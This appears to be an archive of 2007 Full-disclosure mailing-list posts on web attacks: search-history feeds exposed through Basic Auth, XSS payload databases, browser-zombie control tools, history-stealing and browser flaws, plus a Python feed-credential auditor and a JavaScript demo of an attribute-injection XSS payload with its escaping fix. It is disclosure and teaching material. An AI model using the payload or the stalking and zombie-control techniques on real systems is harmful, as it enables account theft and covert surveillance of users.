just to add, Google WebSearch is just one of the many services that offer feed export. Pretty much everything else has that option too and can be accessed through basic auth. I know that this is an obstacle. However, keep in mind that the purpose of this post is not to show how to own people but to elaborate on what can be done after that. I mean, if the attacker has access to your account, they may as well turn the WebHistory ON if it is OFF. All attackers want from you is to get your secrets. Consider it like the situation where you have physical/remote access to a machine and now you want to install a rootkit or keylogger.

On 7/22/07, Greenarrow 1 [EMAIL PROTECTED] wrote:
Well, for one, for security purposes why would anyone log into Google for search purposes. Second, most people I know who use any type of security usually use a proxy if they are doing unknown type searches or surfing the web. This would place a kink in the ease of getting the info you stated in your email. While yes, if anyone wanted to get your info that bad it would not matter what method one uses, but I see the way you show as being the way a common Windows home user would seek search data and I sure hope that corporate does not go this route.

Regards, George Greenarrow1 InNetInvestigations-Forensic

- Original Message -
From: pdp (architect) [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk; OWASP Leaders [EMAIL PROTECTED]; WASC Forum [EMAIL PROTECTED]
Sent: Saturday, July 21, 2007 2:04 AM
Subject: [WEB SECURITY] digital stalking, Google SearchHistory RSS Interface
http://www.gnucitizen.org/blog/snoop-onto-them-as-they-snoop-onto-us [...]

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] digital stalking, Google SearchHistory RSS Interface
http://www.gnucitizen.org/blog/snoop-onto-them-as-they-snoop-onto-us

This is not much of a news item since the service has been available since January this year; however, I cannot see that many people discussing it. Anyway, Google allows consumption of SearchHistory profiles as simple RSS/ATOM feeds. IMHO, this will impact the security and privacy of the users (us) quite significantly.

[...]

The search history feed can be accessed from the following url: http://www.google.com/history/?output=rss. The interesting thing is that if you are not authenticated, the Google service will ask you to do so, but through HTTP Basic Authentication. Now we all know how weak Basic Authentication is. By default, basic auth does not have any account lockout capabilities. Yes, this feature can be introduced and I haven't really tested it out on Google's SearchHistory feed interface. Apart from that, the real danger is that if someone has your account details, they could potentially become your invisible stalker.

Snoop onto Them as they Snoop onto us. In the digital age, compromising someone's email just for the sake of it does not make sense. What is more interesting is to learn as much as possible from the victim and use this knowledge for your own benefit. This is what attackers will be after. Relevant searches, places that you have been, stats, trends, secrets. If you have the Google Toolbar then you are even more screwed, since every step that you make will be recorded. Given the fact that everything is accessed via RSS, this information can be easily analyzed, aggregated and even exported to the NET for everyone to see. As we all know Basic Auth credentials are part of the URL scheme, and almost every RSS/ATOM aggregator supports them: http://username:[EMAIL PROTECTED]/history/?output=rss. What is even worse is that we can also perform queries on the history like this: https://www.google.com/searchhistory/find?q=[query]output=rss.

Keep in mind that the SearchHistory is recording your moves no matter whether you want it or not. Your actions will be recorded for as long as you perform queries while being logged into Google or you have the Google Browser Toolbar installed. I am not saying that GOOGLE is bad. All I am saying is that someone can use this interface to harm others. It makes the process so much easier.

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
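The defensive consequence of the point above (aggregators accept `http://user:pass@host/...` feed URLs) is that OPML exports, aggregator configs and proxy logs become credential stores. The audit routine below is an added example, not code from the post or from Google: it walks a list of feed URLs, flags those carrying userinfo and returns them with the credentials stripped so the report itself does not leak them. The feed list is constructed for the example.

```python
"""Audit feed subscription URLs for embedded HTTP Basic Auth credentials.
Added example, not from the original post; the feed list is constructed."""
from urllib.parse import urlsplit, urlunsplit

# Constructed sample: feed URLs as an aggregator might store them in an
# OPML export. The second and third carry credentials in the userinfo part.
SAMPLE_FEEDS = [
    "http://www.google.com/history/?output=rss",
    "http://alice:hunter2@www.google.com/history/?output=rss",
    "https://bob:s3cret@example.invalid/searchhistory/find?q=test&output=rss",
    "https://example.invalid/feed.xml",
]


def has_embedded_credentials(url):
    """True if the URL's authority section contains a username or password."""
    parts = urlsplit(url)
    return parts.username is not None or parts.password is not None


def redact(url):
    """Return the URL with the userinfo removed; host and port are kept so the
    finding is still actionable. (IPv6 literals would need re-bracketing;
    not handled here.)"""
    parts = urlsplit(url)
    if not has_embedded_credentials(url):
        return url
    netloc = parts.hostname or ""
    if parts.port is not None:
        netloc = f"{netloc}:{parts.port}"
    return urlunsplit((parts.scheme, netloc, parts.path, parts.query, parts.fragment))


def audit_feeds(urls):
    """Split a feed list into (flagged_redacted_urls, clean_urls)."""
    flagged, clean = [], []
    for url in urls:
        if has_embedded_credentials(url):
            flagged.append(redact(url))
        else:
            clean.append(url)
    return flagged, clean


if __name__ == "__main__":
    bad, ok = audit_feeds(SAMPLE_FEEDS)
    print("feeds with embedded credentials (redacted):", bad)
    print("clean feeds:", ok)
```

The same check is worth running over access logs on any service that accepts Basic Auth in the URL: a single entry in a referrer or proxy log is enough to hand the account to whoever reads that log.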
[Full-disclosure] new version of XSSDB
Hi there,

GC has released a new version of XSSDB (http://www.gnucitizen.org/xssdb). The current version contains an XSS testing tool which is there to try each payload against the applications you are testing. You can submit XSS payloads. We are still in beta/alpha stage but gradually moving forward. Your feedback will be greatly appreciated. We are also working on a toolkit for Technika to automate some other tasks.

thanks for the interest

P.S. according to .mario, our leading database maintainer and founder of the PHPIDS group, there will be more than 50 new payload additions over the following couple of weeks.

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] [WEB SECURITY] digital stalking, Google SearchHistory RSS Interface
comments inlined

On 7/22/07, Greenarrow 1 [EMAIL PROTECTED] wrote:
Well, for one, for security purposes why would anyone log into Google for search purposes.

people login to check their email, chat and play with the toys on their iGoogle. for most of the time, they are logged into Google.

Second, most people I know who use any type of security usually use a proxy if they are doing unknown type searches or surfing the web. This would place a kink in the ease of getting the info you stated in your email.

:) keep in mind that most users are not tech/sec savvy

While yes, if anyone wanted to get your info that bad it would not matter what method one uses, but I see the way you show as being the way a common Windows home user would seek search data and I sure hope that corporate does not go this route.

the point that I am trying to make is that the attacker doesn't need to have access to your computer anymore. The data is available online 24/7. It is a lot easier to access a Google feed than some computer behind some obscured and poorly configured NATed network.

Regards, George Greenarrow1 InNetInvestigations-Forensic

Thanks George, cheers :)

- Original Message -
From: pdp (architect) [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk; OWASP Leaders [EMAIL PROTECTED]; WASC Forum [EMAIL PROTECTED]
Sent: Saturday, July 21, 2007 2:04 AM
Subject: [WEB SECURITY] digital stalking, Google SearchHistory RSS Interface
http://www.gnucitizen.org/blog/snoop-onto-them-as-they-snoop-onto-us [...]

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] Client-side JavaScript XSS Scanner - runs straight from your browser
http://www.gnucitizen.org/blog/javascript-xss-scanner

This POC shows how easy it is to implement an XSS scanner by using only JavaScript and a few tricks from the Web2.0 world. A similar technique can be easily implemented into AJAX/XSS worms which will allow them to propagate across several domains and also find new vulnerabilities on their own. Don't be evil. Use the POC for educational and demonstration purposes only.

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] JavaScript Spider - Yahoo Site Explorer Spider
http://www.gnucitizen.org/blog/yahoo-site-explorer-spider

This simple POC uses the Yahoo Site Explorer Service to crawl/spider other websites. It is written entirely in JavaScript - no server side support was required from my side. The POC proves once again that Web2.0 technologies open new ways of attacking Web infrastructures. Keep in mind that this spider is ultra fast. It does only several connects in order to obtain the entire directory structure of the targeted website. Also, keep in mind that it will take less than 5 minutes to equip it with the latest AJAX exploits. Therefore, I am not responsible for your actions. I am planning to write a follow up post on how we can make a basic client-side XSS scanner on top of this spider, so stay tuned.

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] The new dawn of filter evasion
http://www.gnucitizen.org/blog/the-new-dawn-of-filter-evasion .mario (http://www.gnucitizen.org/about/mario) has posted a quite cool overview of filter evasion practices. Here is the excerpt: This article is about the most important phase when attacking a web application. The phase when the markup has just been broken and the attacker will try to inject his own markup, script code or other data - let's call it the PMBP (post-markup-breaking-phase). This phase mostly occurs when quotes aren't correctly sanitized or when input is placed between two tags. In this article we will set the focus on the first variant - the attribute injection. And we will prove that protecting your markup from being broken is the very most important task in client side security. He goes further and dissects the process into the following sections: * Basic filtering * Get it running * Circumvent the ignorance * CSO's nightmare Very interesting! -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
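An added example of the attribute-injection case the excerpt above describes. This is my code, not code from the post or from .mario's article: a "basic filter" that removes script tags and javascript: URLs but leaves quote characters alone, a template that drops the filtered value into a quoted attribute, and the attribute-encoding fix that keeps the value inside the quotes. The filter, the templates, the payload and the small attribute-name extractor are all constructed for the demonstration.

```javascript
// Added example: attribute injection past a "basic filter" vs. attribute
// encoding. Everything here is constructed for the demo; it is not code
// from the post or from the article it links to.

// A typical basic filter: strips <script> tags and javascript: URLs, but
// never touches quote characters, so it cannot stop attribute injection.
function basicFilter(input) {
  return String(input)
    .replace(/<\s*\/?\s*script[^>]*>/gi, '')
    .replace(/javascript\s*:/gi, '');
}

// Vulnerable template: the filtered value lands inside a quoted attribute.
function renderVulnerable(query) {
  return '<input type="text" name="q" value="' + basicFilter(query) + '">';
}

// Fix: encode every character that can close the attribute or start a new
// one, so the value can never leave the quotes no matter what it contains.
function escapeAttr(value) {
  return String(value).replace(/[&<>"'`=\/]/g, function (c) {
    return '&#' + c.charCodeAt(0) + ';';
  });
}

function renderSafe(query) {
  return '<input type="text" name="q" value="' + escapeAttr(query) + '">';
}

// Lists the attribute names of the first tag in `html`, i.e. what a browser
// would treat as attributes. Minimal tokenizer, just enough for the demo.
function attributeNames(html) {
  const tag = String(html).match(/^<[a-zA-Z]+([^>]*)>/);
  if (!tag) return [];
  const names = [];
  const re = /\s([a-zA-Z][\w-]*)\s*(?:=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  let m;
  while ((m = re.exec(tag[1])) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Constructed payload: no <script>, no javascript:, so the filter passes it
// untouched; the leading quote closes value="" and the remainder becomes a
// new event-handler attribute on the same element.
const PAYLOAD = '" onmouseover="alert(document.cookie)';

function demo() {
  return {
    filteredPayload: basicFilter(PAYLOAD),
    vulnerableAttrs: attributeNames(renderVulnerable(PAYLOAD)),
    safeAttrs: attributeNames(renderSafe(PAYLOAD)),
    safeHtml: renderSafe(PAYLOAD)
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Run with `node` to see the vulnerable rendering grow a fourth attribute, `onmouseover`, while the encoded rendering keeps only `type`, `name` and `value`. The point of the example is the one the article makes: the filter never had to be bypassed, because the injection happens in the attribute layer the filter does not look at; contextual output encoding, not blacklisting, is the fix.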
[Full-disclosure] projections - another Web2.0/Security projection
http://www.gnucitizen.org/blog/projections This article is about future developments in the Web world, emphasizing the Web2.0 movement. I also cover what the future holds for security experts who research this area. I don't know, you might be interested. If you aren't, trash the mail :) -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] XSSDB Elite (Web2.0 Engineering)
http://www.gnucitizen.org/blog/xssdb-elite http://www.gnucitizen.org/xssdb XSSDB is an advanced application that uses the latest Web2.0 Engineering practices in order to create a full-featured cross-site scripting database. I would like to call the new version of XSSDB XSSDB Elite, since it is lighter, smaller, better, and a lot more featureful. XSSDB started as a simple interface to RSnake's Cross-site Scripting Cheat Sheet, which is still one of the most accurate resources for Cross-site Scripting attacks to date. This status, however, may change. Soon after I published the first version of XSSDB, I realized that we need to give the power back to the community in order to keep up with the latest Cross-site scripting attack vectors. At that time RSnake was the only one handling all changes to his cheat sheet, and this is the reason why updates were coming rather slowly. There were (there still are) tons of attack vectors that were not properly documented. The cheat sheet, although the best, was just not enough. How do you expect developers to come up with good enough anti-XSS solutions when there is no single entry point to cover the vast topic of Cross-site scripting attacks? There was a problem and no one was around to handle it. I was planning to integrate a simple database backend into XSSDB based on Wordpress. However, due to resource limitations, I had to leave the project for later. Meanwhile, another organization, XSSED.com, took the initiative to collect various Cross-site scripting holes that are found within real websites. IMHO, the idea was interesting but not very well implemented. The purpose of XSSED.com should have been to protect the website owners by providing an early warning system. This is the reason why I targeted this website in particular in my research on hacking Web2.0 services/applications (Advanced Web Hacking Revealed), presented at OWASP, Italy 2007.
During the conference, I discussed how attackers can use Dapper in combination with Yahoo Pipes to dynamically fetch entries from XSSED.com and exploit the affected sites. An XSS worm that implements similar functionality has the potential to propagate across the entire Web. Obviously, this is quite dangerous. After OWASP, I promised myself to come back and work on XSSDB to provide the best possible community-driven XSS Database service. I was planning to use all my skills and knowledge in client side hacking to implement this system. The main goal was to keep the database decentralized so no one is in charge. This is how XSSDB Elite was born. The current version of XSSDB is entirely client-side based (i.e. it is a mashup). The database is handled by Zoho Creator and anyone who is willing to become a maintainer/moderator is welcome to drop us an email. At the moment XSSDB allows you to add new XSS exploits and site-specific exploits. The GNUCITIZEN group is currently working on the warning system, which will be implemented soon. The database is backed up on a regular basis by several aggregators, which include: Securls.com, Google Reader and Feed Burner. We encourage users to subscribe to both XSSDB feeds so the community can recover if the database fails at some point in the future. So, this is it. XSSDB is one pretty good proof of concept that shows what can be achieved with minimal effort and a good understanding of Web2.0 engineering. Drop us an email or leave a comment on the post to tell us what you think. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] Attacking Password Recovery Facilities
http://www.gnucitizen.org/blog/attacking-password-recovery-facilities This is a small article from ap (aka pagvac) on how to attack password recovery facilities. This post just briefly scratches the surface and I am sure that he will come up with more stuff in the near future. Nevertheless, he brought up some interesting points. Have a look. Cheers. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] The Top 5 most Popular Web2.0 Services Hackers Cannot live Without
http://www.gnucitizen.org/blog/the-top-5-most-popular-web20-services-hackers-cannot-live-without Let's have a look at the top 5 most popular Web2.0 services hackers cannot live without. This listing is based on my personal research that was also presented at OWASP Web Application Security Conference 2007 in Italy. The article covers: Yahoo Pipes, Dapper, Feed43, Zoho Creator, Google Reader. Enjoy -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] Landing Securls.com
http://www.gnucitizen.org/blog/landing-securlscom In the last couple of months the GNUCITIZEN group has been secretively working on projects of various natures. We've jump-started blogsecurity.net, the only organization that deals exclusively with web blog security, and we also introduced great improvements into the GNUCITIZEN Gadgets Interface, which rocks, as you can see from its project page here (http://www.gnucitizen.org/projects/gadgets). Let's not forget about AttackAPIv3 (http://www.gnucitizen.org/projects/attackapi), which will be available for download as soon as we fix the documentation, and Hakiri (http://www.hakiri.com), which will make its way through as the first hacker lifestyle portal very soon. Today we are announcing a new project called SECURLS (http://www.securls.com) and we hope that you will find it as interesting and useful as we do. SECURLS is a place where you can get the latest headlines from the security industry's social networks. The website will allow you to glance through the most important bits and pieces without the hassle of managing and organizing the vast streams of information yourself. At the moment the website is relatively small; however, further improvements are planned to be launched very soon, so please stay tuned. So far, you can get the latest entries from a list of websites we believe cover a large enough user base. Of course we are open to any suggestions that you may have in mind. In the upcoming months, we are going to integrate a context-sensitive system which will allow you to filter the information that is most relevant to you. Among the planned improvements we have things such as Google Hacking Database and XSSED.com integration, video casts, tutorials, presentations, etc. We are also going to improve the current feeds and launch a SECURLS version for mobiles. It is important to understand that SECURLS is not the traditional link directory most sites provide anyway.
Behind the scenes we work with the latest Mashup technology to integrate information sources, perform contextual searches, filter relevant information and in general provide the best quality of service available today. We are proud of what we've got so far. SECURLS IS NOT A SPLOG. THE SITE RANKING WON'T BENEFIT FROM THE GATHERED/COLLECTED CONTENT. So, this is it. If you find it interesting, please drop us an email. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] One Drop on A Spider Web
http://www.gnucitizen.org/blog/one-drop-on-a-spider-web just another way of doing XSS -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] A Brief History of MySpace
http://www.gnucitizen.org/blog/a-brief-history-of-myspace -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] About the power of Google
http://www.gnucitizen.org/blog/about-the-power-of-google Google has become the most profitable organization on the Web, having access to millions of people's personal information, providing free services in exchange for even more data, and dominating the web as we know it today. It is time to question Google's dominant position on the global market, before it is too late. In the months to follow, I am going to present a series of posts on how Google has transformed from the "don't be evil" search engine company into the true hacker platform. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] Does what happens in the Facebook stay in the Facebook?
http://www.gnucitizen.org/blog/does-what-happens-in-the-facebook-stay-in-the-facebook Does what happens in the Facebook stay in the Facebook? is a quite clever video that shows some of the privacy issues that concern social networks today. I talked about this topic in the Social Networks Mayhem article, which was published not that long ago. The real question is: if Facebook has access to so much information, what do hackers have access to? Hmmm… -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] The Next Super JavaScript Malware - the web has crashed
The reason attackers will go for XSSED.com instead of providing their own database is that XSSED has a bigger audience and the chances of someone contributing a new vector are higher. Web2.0 is all about segmenting services into small, independent but very useful blocks. So, why bother creating a new database when you can use whatever is already available online. IMHO, malware code that makes use of various databases online can impact the Web to an extent beyond our imagination. For sure you can shut down the service at any given time but that won't make any difference at all. I use XSSED.com as an example because it is the biggest database available today. If you shut down the service, it won't take long for attackers to find another database and reconfigure the infrastructure to support it as well. In fact, attackers can submit XSS vectors to Google Base. On 5/30/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Dear petko d. petkov, I don't know if it was your intention, but you're giving a bad name to xssed.com, whose goal is to organize the public XSS vulnerabilities, make statistics, and first of all to spread education about XSS vulnerabilities. While the scenario you describe is somehow possible, it relies on the availability of our web site, and we'd be able to stop it quickly. Anybody would be able to build such an XSS list without the need of our site, and with their own discoveries. I wanted to clarify it. Anyway I think that everybody here on the list knows the dangers and advantages of full disclosure.. Kevin http://www.gnucitizen.org/blog/the-next-super-worm In this article I explain a technique that can be used by malicious minds to build the next generation of JavaScript based malware. The post is for education purposes and I welcome everyone who has ideas on how to stop these types of attacks to do so by sending an email or posting a comment. We do really need to start thinking about how to fight back and start developing strategies that can apply.
cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] The Next Super JavaScript Malware - the web has crashed
http://www.gnucitizen.org/blog/the-next-super-worm In this article I explain a technique that can be used by malicious minds to build the next generation of JavaScript based malware. The post is for education purposes and I welcome everyone who has ideas on how to stop these types of attacks to do so by sending an email or posting a comment. We do really need to start thinking about how to fight back and start developing strategies that can apply. cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] GHDB - Google Hacking Database
http://www.gnucitizen.org/projects/ghdb http://www.gnucitizen.org/ GHDB (a.k.a. Google Hacking Database) is an HTML/JavaScript wrapper application that uses advanced JavaScript techniques to scrape information from Johnny's Google Hacking Database without the need for hosted server side scripts. In an attempt to show the real dangers of AJAX APIs I've created a completely harmless interface to Johnny's Google Hacking Database. Keep in mind that no server side scripts are required from my side. Also, keep in mind that all I am providing here is a single HTML page with a few JavaScript files to glue the interface together. The danger that I am trying to show here is that by mashing up a few services, attackers can create something which I would like to call a super worm. Super Worms, in terms of Web Application Security, are the successors of AJAX Worms! Original AJAX worms spread across a single domain, mimicking retro viral code: the worm does not leave the medium it infects. Super Worms can go further by exploiting other domains/mediums as well, such as other websites, local and remote devices, etc. It took me 2 hours to put the application together. Most of the time I spent on the style sheets and the GUI. The core application functionality was delivered within 5 minutes. Why is this application interesting, you may ask? If I am not hosting any server side scripts on my side, and Johnny's johnny.ihackstuff.com does not provide any JSON export of the database either, how the heck do I still manage to fetch the data? Well, I am using a screen scraper which is entirely based online. Online services are very Web2.0, so expect to see more of them very soon. For Web based malware, this means that they no longer need server side support. That is quite scary. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] The Web has Betrayed Us
http://www.gnucitizen.org/blog/the-web-has-betrayed-us/ http://www.gnucitizen.org/ This is a short explanation of the Advanced Web Hacking talk for OWASP. The post outlines some of the important aspects that were covered. There is a lot more to it, but it is a good start I believe. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] 2057 - The City
I stumbled across this documentary about cities of the future. For those who haven't seen it yet, it is highly recommended. It will take only 43:29 minutes of your time. Believe me, it is worth looking at. It is quite exciting to look into stuff that may happen in the future. This documentary, in particular, is interesting because it depicts what will happen when our highly computerized world crashes and burns. Everything is so dependent on IT security and I am not sure whether people realize it. So, I am not going to spam you more with this message. Those who are interested, click here: http://www.gnucitizen.org/blog/2057-the-city -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] Persistent CSRF and The Hotlink Hell
http://www.gnucitizen.org/blog/persistent-csrf-and-the-hotlink-hell/ http://michaeldaw.org/papers/hotlink_persistent_csrf/ I would like to bring your attention to a topic that has been rarely discussed. I am going to talk about hotlinks, redirections and of course CSRF (Cross-site Request Forgery). When we talk about CSRF we often assume that there is one kind only. After all, what else is in there when CSRF is all about making GET or POST requests on behalf of the victim? The victim needs to visit a page which launches the CSRF exploit. If the victim happens to have an established session with the exploited application, the attacker can perform the desired action like resetting the login credentials, for example. However, CSRF can be as persistent as persistent XSS (Cross-site Scripting) is and you don't need XSS to support it. Persistent CSRF is not dependent on persistent XSS. I hope that you find the post useful. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] Application Layer Anti-virus/Firewall
http://www.gnucitizen.org/blog/application-layer-anti-virusfirewall I wrote a small article on an application layer Anti-virus/Firewall solution that I have in mind. I am not sure if that will be useful to anyone but it is still an interesting thing to think about. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] Firefox extensions go Evil - Critical Vulnerabilities in Firefox/Firebug
http://www.gnucitizen.org/blog/firebug-goes-evil There is a critical vulnerability in Firefox/Firebug which allows attackers to inject code inside the browser chrome. This can lead to a lot of problems. Theoretically everything is possible, from modifying the user's file system to launching processes, installing ROOTKITs, you name it. I recommend disabling Firebug for now until the issue is fixed. The issue is a bit critical since Firebug is one of the most popular extensions for Firefox. Given the fact that a lot of Firefox users are geeks, the chances of having Firebug installed in a random Firefox client are quite high. I wrote two POCs to demonstrate the issue. You can find them on the page at the top of this message. The first POC runs calc.exe and cmd.exe on Windows systems. The second POC does a countdown from 10 to 0 and executes calc.exe to prove that automatic execution is possible. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] Preventing Cross-site Request Forgeries
http://www.gnucitizen.org/blog/preventing-csrf I briefly covered how simple it is to prevent CSRF attacks. Hope that you find it useful. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] ZombieMap - GEO Zombie Mapper
http://www.gnucitizen.org/projects/zombiemap http://www.gnucitizen.org/services/carnaval http://www.gnucitizen.org/projects/attackapi/ http://www.gnucitizen.org/projects/backframe/ ZombieMap is an AJAX application that you can use to locate Zombies hooked on bi-directional persistent communication channels. Carnaval is such a type of channel and it is added by default. If you want to spawn your own attack channel, use AttackAPI's channel.php infrastructure module. These Zombies can be controlled with the Backframe Attack Console. If you cannot see points on the map in the first 5 seconds, most probably there are no attached clients. For testing purposes, open another browser (different from the one you use for ZombieMap) and point it here. Have fun! -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] Web Security and Bookmarklet Exploits
http://www.gnucitizen.org/blog/sex-candies-and-bookmarklet-exploits http://www.gnucitizen.org/projects/technika/ I have rolled out a new Technika browser extension. It is very small and extremely fast. Technika also integrates with Firebug, so you can easily test and compose Bookmarklets on the fly. The article that I pointed to above discusses how Bookmarklets can be used to compose web app exploits. There is a framework similar to metasploit that will come out very soon. I thought that it might be a good idea to share these ideas now, so the community knows what to expect in the future. Thanks. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] Phishing using IE7 local resource vulnerability
quite cool, good work On 3/14/07, avivra [EMAIL PROTECTED] wrote: Summary Internet Explorer 7.0 is vulnerable to cross-site scripting in one of its local resources. In combination with a design flaw in this specific local resource it is possible for an attacker to easily conduct phishing attacks against IE7 users. Affected versions: Windows Vista - Internet Explorer 7.0; Windows XP - Internet Explorer 7.0. Workaround / Suggestion: Until Microsoft fixes this vulnerability, do not trust the Navigation Canceled page! Technical Details and Proof-of-Concept can be found here: http://aviv.raffon.net/2007/03/14/PhishingUsingIE7LocalResourceVulnerability.aspx -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] new AttackAPI
for those who are interested in Web 2.0 security, there is a new version of AttackAPI that you can download from here: http://www.gnucitizen.org/projects/attackapi/ There is still no documentation, which is a bit of a drawback, but that will be generated soon. If anyone is interested in documenting some of the features, please contact us. There is also a simple bookmarklet that you can use to load AttackAPI on any page. You can install it from here: http://www.gnucitizen.org/projects/load-attackapi-bookmarklet -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] PDF Strikes Back
http://www.gnucitizen.org/projects/pdf-strikes-back/ Just recently I have been researching PDF vulnerabilities again. I based my research on the work I did with David Kierznowski on PDF backdoors. My research does not show anything surprising but it outlines some important issues that should be kept in mind. cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] Stealing Browser History Without Using JavaScript
I've created a generic scanner based on this technique that everybody can use. It is located here: http://www.gnucitizen.org/projects/noscript-hscan/ RSnake, great job! On 2/28/07, RSnake [EMAIL PROTECTED] wrote: In case anyone is interested, I was able to port the old CSS history hacking stuff that Jeremiah Grossman originally found to a version that does not require JavaScript to fire using images and conditional logic built into CSS using a:visited and display attributes. It works in both IE7.0 and Firefox 2.0.0.2. Details at the link below: http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/ -RSnake -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] Advisory 03/2007: Multiple Browsers Cross Domain Charset Inheritance Vulnerability
indeed On 2/23/07, Michal Zalewski [EMAIL PROTECTED] wrote: On Fri, 23 Feb 2007, Stefan Esser wrote: Proof of Concept: The Hardened-PHP Project is not going to release a proof of concept exploit for this vulnerability. ...because pretty much no exploit is needed. Scary. Good catch. /mz -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] Firefox Cache Hack - Firefox History Hack redux
http://www.gnucitizen.org/projects/hscan-redux/ Inspired by Michal Zalewski's recent Firefox bug hunt, I decided to give it a go and see what I could come up with. We all know how vulnerable Firefox and other browsers are. This is the reason why I am not particularly interested in finding specific browser bugs. However, when you are in hack mode things like this don't really matter. This vulnerability is not a reworked version of Jeremiah Grossman's history hack. It is completely different and it should be treated as a new issue. The peculiar thing about this vulnerability is that it tells you which URLs you have attended during the current browser session (since the last time you opened your browser). I am not sure how useful this is. Keep in mind that attackers can abuse this vulnerability in order to extract valuable information about your browsing habits. They can also use this hack to precisely detect whether you are logged into your router management interface. They can use this hack to detect your router type and version as well. Based on this information, they might be able to compromise the integrity of your network. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] Firefox Cache Hack - Firefox History Hack redux
I have no idea. I have tested it on 2.0.0.1. On 2/23/07, Michael Silk [EMAIL PROTECTED] wrote: On 2/23/07, pdp (architect) [EMAIL PROTECTED] wrote: http://www.gnucitizen.org/projects/hscan-redux/ doesn't work, win 2k3, ff 1.5.0.9 -- mike -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
This vulnerability is cute but not very useful, mainly because a lot of social engineering is required. However, here is an interesting thought for you: instead of asking the user to bookmark a page you can supply the bookmark directly to their browser by using Live Bookmarks. So, a mainstream attack will be when a SPLOG network injects malicious links into their feeds. If someone happens to be subscribed to this network with a Live Bookmark and they click on it... well you know. I haven't tested this, although it should work. So, although I would rate this issue as low risk, it could as well be quite high or at least medium. cheers On 2/22/07, Michal Zalewski [EMAIL PROTECTED] wrote: On Thu, 22 Feb 2007, pdp (architect) wrote: michal, is that a feature or a bug? maybe it is not obvious to me what you are doing but I feel that it is almost like asking the user to bookmark a bookmarklet. Bookmarklets should be bookmarkable only manually, with user knowledge and consent (that is, you need to copy-and-paste the URL, etc). This seems to be the case for javascript: URLs. Here, the situation is different: the user can, and quite likely will, unknowingly bookmark a script while attempting to bookmark a regular page via Ctrl-D + return. He doesn't expect or want this code to later run in the context of his start page or any other resource (principle of least astonishment, etc, etc). Cheers, /mz -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
michal, is that a feature or a bug? maybe it is not obvious to me what you are doing but I feel that it is almost like asking the user to bookmark a bookmarklet. of course it is a security problem if you execute an untrusted bookmarklet on a page :). On 2/21/07, Michal Zalewski [EMAIL PROTECTED] wrote: There is an interesting vulnerability in how Firefox handles bookmarks. The flaw allows the attacker to steal credentials from commonly used browser start sites (for Firefox, Google is the seldom changed default; that means exposure of GMail authentication cookies, etc). The problem: it is relatively easy to trick a casual user into bookmarking a window that does not point to any physical location, but rather, is an inline data: URL scheme. When such a link is later retrieved, Javascript code placed therein will execute in the context of a currently visited webpage. The destination page can then continue to load without the user noticing. The impact of such a vulnerability isn't devastating, but as mentioned earlier, any attention-grabbing webpage can exploit this to silently launch attacks against Google, MSN, AOL credentials, etc. In an unlikely case the victim is browsing local files or special URLs before following a poisoned bookmark, system compromise is possible. Thanks to Piotr Szeptynski for bringing up the subject of bookmarks and inspiring me to dig into this. Self-explanatory demo page: http://lcamtuf.coredump.cx/ffbook/ This is being tracked as: https://bugzilla.mozilla.org/show_bug.cgi?id=371179 /mz http://lcamtuf.coredump.cx -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] Microsoft Internet Explorer Local File Accesses Vulnerability
- <script src="file:///C:/test.js"></script>

- Exploitation method:
  - Create a web page or an HTML mail with the vulnerable code
  - When the victim opens the mail or visits the vulnerable site it is possible to access his local files.

Demonstration:
Note: The demonstration will try to access a few default images and wave files
- Visit the POC
- If a vulnerable Internet Explorer is used it will show your local sample images and give a proper alert.

